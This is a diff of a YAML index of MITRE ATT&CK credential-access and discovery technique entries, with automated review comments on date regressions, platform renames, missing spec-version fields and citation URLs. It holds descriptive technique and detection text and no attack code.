+ Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc245496.aspx
+ - source_name: Samba DRSUAPI
+ description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+ url: https://wiki.samba.org/index.php/DRSUAPI
+ - source_name: Harmj0y DCSync Sept 2015
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved December 4, 2017.
+ url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: Harmj0y Mimikatz and DCSync
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: InsiderThreat ChangeNTLM July 2017
+ description: Warren, J. (2017, July 11). Manipulating User Passwords with
+ Mimikatz. Retrieved December 4, 2017.
+ url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+ - source_name: Wine API samlib.dll
+ description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+ url: https://source.winehq.org/WineAPI/samlib.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.006
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
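Review bot: the T1003.006 references contain two entries for the same post at `https://adsecurity.org/?p=1729` (`ADSecurity Mimikatz DCSync` and `AdSecurity DCSync Sept 2015`) and two Harmj0y entries where only `Harmj0y Mimikatz and DCSync` was moved to `https://blog.harmj0y.net/...` while `Harmj0y DCSync Sept 2015` still points at plain-http `http://www.harmj0y.net/blog/...`. Both citation keys are used in the description and detection text, so they cannot simply be merged, but the stale http URL should be updated to match its sibling.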
@@ -48145,6 +48869,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -48181,17 +48906,17 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
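Review bot: the platform list for T1556 replaces `Azure AD`, `Google Workspace` and `Office 365` with `Office Suite` and `Identity Provider` (version 2.4 to 2.5); anything downstream that filters on the old platform names (per-platform indexes, test selection) will silently match nothing for this technique after merge, so those consumers should be regenerated or updated in the same change.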
@@ -48237,81 +48962,10 @@ credential-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
- type: attack-pattern
- created: '2020-02-11T19:01:15.930Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1056.004
- url: https://attack.mitre.org/techniques/T1056/004
- - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
- description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
- Retrieved December 18, 2017.
- url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
- description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
- December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
- description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
- description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
- 12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
- description: Stack Exchange - Security. (2012, July 31). What are the methods
- to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-27T21:03:56.385Z'
name: 'Input Capture: Credential API Hooking'
description: |
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -48324,28 +48978,94 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ created: '2020-02-11T19:01:15.930Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
+ - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+ description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+ Retrieved December 18, 2017.
+ url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+ - source_name: Microsoft Hook Overview
+ description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+ December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
+ description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
+ description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+ 12, 2017.
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
+ description: Stack Exchange - Security. (2012, July 31). What are the methods
+ to find hooked functions and APIs?. Retrieved December 12, 2017.
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1056.004
atomic_tests: []
T1552.007:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:25:28.820Z'
name: Kubernetes List Secrets
description: "Adversaries may gather credentials via APIs within a containers
environment. APIs in these environments, such as the Docker API and Kubernetes
@@ -48402,9 +49122,8 @@ credential-access:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.007
atomic_tests: []
T1556.004:
@@ -48435,7 +49154,7 @@ credential-access:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
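Review bot: T1556.004's `modified` moves backwards, from 2022-05-11 to 2021-12-14. The removed value shares the `T14:00:00.188Z` suffix of the other removed `modified` timestamps in this patch, which suggests the old values were bulk-set rather than taken from upstream; if so the new value is the authentic one, but that should be stated in the PR description so the regression is not mistaken for a stale source.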
@@ -48459,8 +49178,6 @@ credential-access:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
discovery:
T1033:
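Review bot: after this hunk T1556.004 has neither `spec_version` nor `x_mitre_attack_spec_version` (the old 2.1.0 is removed and no 3.x value is added), and it still carries `x_mitre_permissions_required: Administrator`, which the other entries in this patch drop. Either this object genuinely was not updated upstream, in which case it should keep a spec marker, or the regeneration missed it; either way a reader can no longer tell which schema this entry follows.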
@@ -48525,12 +49242,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1033
atomic_tests: []
T1613:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:08:50.706Z'
name: Container and Resource Discovery
description: "Adversaries may attempt to discover containers and other resources
that are available within a containers environment. Other resources may include
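Review bot: T1613's `modified` also moves backwards here (2023-05-09 to 2023-04-15), the same pattern as T1556.004 above; one sentence in the PR description confirming these come from the upstream STIX objects would cover all of them.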
@@ -48589,7 +49305,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1613
atomic_tests: []
T1016.001:
@@ -48610,7 +49325,7 @@ discovery:
- source_name: mitre-attack
external_id: T1016.001
url: https://attack.mitre.org/techniques/T1016/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-25T17:03:26.632Z'
name: 'System Network Configuration Discovery: Internet Connection Discovery'
description: |-
Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert
, and GET requests to websites.
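Review bot: T1016.001's `modified` moves backwards from 2022-04-25 to 2021-03-25 (same pattern as the other `T14:00:00.188Z` removals). Separately, the unchanged description context shows `tracert` broken onto its own line followed by a line holding only `,`, which looks like a flattened link in the source data; worth fixing in the generator input rather than by hand here.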
@@ -48631,13 +49346,11 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1016.001
atomic_tests: []
T1069:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:03:06.294Z'
name: Permission Groups Discovery
description: |-
Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
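Review bot: T1016.001 loses both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` with nothing added in their place while keeping `x_mitre_permissions_required: User`, leaving it, like T1556.004, with no indication of which attack spec it follows; either restore a spec marker or confirm upstream no longer emits one for this object.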
@@ -48660,15 +49373,14 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Group: Group Metadata'
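Review bot: the platform list for T1069 replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider` (the ATT&CK v16 platform consolidation, consistent with the new 2024-10-15 `modified` date), and T1069.003 gets the same treatment in the next hunk. Any per-platform index or filter that still matches on the old strings will silently select nothing after this lands, so the same change should regenerate those artifacts and a grep for the three retired platform names across the repository is a cheap sanity check.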
@@ -48694,13 +49406,12 @@ discovery:
url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1069.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:51:35.759Z'
name: Cloud Groups
description: |-
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -48725,12 +49436,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -48772,13 +49482,12 @@ discovery:
url: https://github.com/True-Demon/raindance
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1615:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-01-06T12:41:08.579Z'
name: Group Policy Discovery
description: |-
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\SYSVOL\\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -48839,12 +49548,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1615
atomic_tests: []
T1652:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:07:16.804Z'
name: Device Driver Discovery
description: |-
Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -48908,19 +49616,18 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1652
atomic_tests: []
T1087.002:
technique:
- modified: '2024-04-15T21:33:57.732Z'
+ modified: '2024-05-31T04:00:37.651Z'
name: 'Account Discovery: Domain Account'
description: "Adversaries may attempt to get a listing of domain accounts. This
information can help adversaries determine which domain accounts exist to
aid in follow-on behavior such as targeting specific accounts which possess
particular privileges.\n\nCommands such as net user /domain
and
net group /domain
of the [Net](https://attack.mitre.org/software/S0039)
- utility, dscacheutil -q group
on macOS, and ldapsearch
+ utility, dscacheutil -q group
on macOS, and ldapsearch
on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
cmdlets including Get-ADUser
and Get-ADGroupMember
may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
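Review bot: the removed and added lines `utility, dscacheutil -q group` / `on macOS, and ldapsearch` are textually identical as rendered, so the change in this hunk is whitespace-only or lives in inline markup that the rendering has stripped (the line breaks around `net user /domain`, `dscacheutil -q group` and `ldapsearch` in the description suggest stripped code tags). Confirm the diff is intentional; if the generator now normalizes whitespace or markup in descriptions, say so in the commit message, since otherwise a reviewer has to diff the raw bytes to see what changed.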
@@ -48967,7 +49674,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.002
atomic_tests: []
T1087.001:
@@ -49034,12 +49740,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.001
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -49129,18 +49834,17 @@ discovery:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests: []
T1069.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:16:47.754Z'
name: 'Permission Groups Discovery: Domain Groups'
description: |-
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
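Review bot: the Deloitte Environment Awareness reference gains an `/edit` suffix on its Google Drive URL along with the new retrieval date of September 13, 2024, and the same URL change recurs for T1497.003 later in the patch. The editor view of a Drive link may not behave like the bare file link for an anonymous reader, so verify the new URL resolves without sign-in before committing it as the citation of record; the retrieval-date update itself is appropriate.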
@@ -49183,12 +49887,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.002
atomic_tests: []
T1007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:55:18.326Z'
name: System Service Discovery
description: |-
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query
, tasklist /svc
, systemctl --type=service
, and net start
.
@@ -49229,12 +49932,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1007
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -49319,7 +50021,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests: []
T1135:
@@ -49381,12 +50082,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1135
atomic_tests: []
T1120:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:41.575Z'
name: Peripheral Device Discovery
description: 'Adversaries may attempt to gather information about attached peripheral
devices and components connected to a computer system.(Citation: Peripheral
@@ -49437,12 +50137,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1120
atomic_tests: []
T1082:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:42:22.247Z'
name: System Information Discovery
description: |-
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -49453,7 +50152,6 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Maril Vernon @shewhohacks
- Praetorian
@@ -49468,7 +50166,6 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- IaaS
@@ -49516,7 +50213,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1082
atomic_tests: []
T1016.002:
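Review bot: for T1082 the only substantive change is `x_mitre_attack_spec_version` going from `2.1.0` to `3.2.0`, yet it takes three hunks to express because the key is removed from the top of the object, `x_mitre_modified_by_ref` is removed from the middle, and both are re-added at the bottom. Emitting keys in a stable order in the generator would reduce this to a single one-line change and make value changes like this one reviewable at a glance.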
@@ -49588,12 +50286,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:22:56.372Z'
name: Application Window Discovery
description: |-
